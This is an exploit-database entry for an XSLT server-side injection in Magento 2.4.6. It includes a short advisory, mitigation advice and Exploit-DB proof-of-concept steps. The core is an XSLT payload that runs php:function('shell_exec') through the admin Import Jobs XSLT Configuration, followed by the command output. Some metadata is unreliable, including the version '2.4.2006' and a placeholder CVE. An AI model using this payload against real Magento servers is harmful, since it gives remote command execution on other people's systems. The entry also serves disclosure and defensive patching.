Magento ver. 2.4.6 - XSLT Server Side Injection

vendor:

Magento

by:

tmrswrr

6.1

CVSS

HIGH

Server Side Injection

CWE

Product Name: Magento

Affected Version From: 2.4.2006

Affected Version To: 2.4.2006

Patch Exists: NO

Related CWE: CVE-2023-XXXX (example)

CPE: a:magento:magento:2.4.6

Metasploit:

Other Scripts: https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

Platforms Tested:

2023

Magento ver. 2.4.6 – XSLT Server Side Injection

An attacker can inject malicious XSLT code through the 'XSLT Configuration' option in the 'Import Jobs' feature of Magento version 2.4.6, allowing them to execute commands on the server. This vulnerability has a potential impact on the confidentiality, integrity, and availability of the system.

Mitigation:

To mitigate this issue, users should update to the latest version of Magento and avoid processing untrusted XSLT configurations. Additionally, restricting access to the affected functionality can also help prevent exploitation.

Source

Exploit-DB raw data:

# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Date:** 2023-11-17
Exploit Author:** tmrswrr
Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
Version:** 2.4.6
Tested on:** 2.4.6

## POC

1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:

   ```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','id')" />
     </xsl:template>
   </xsl:stylesheet>```

##RESULT
  
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)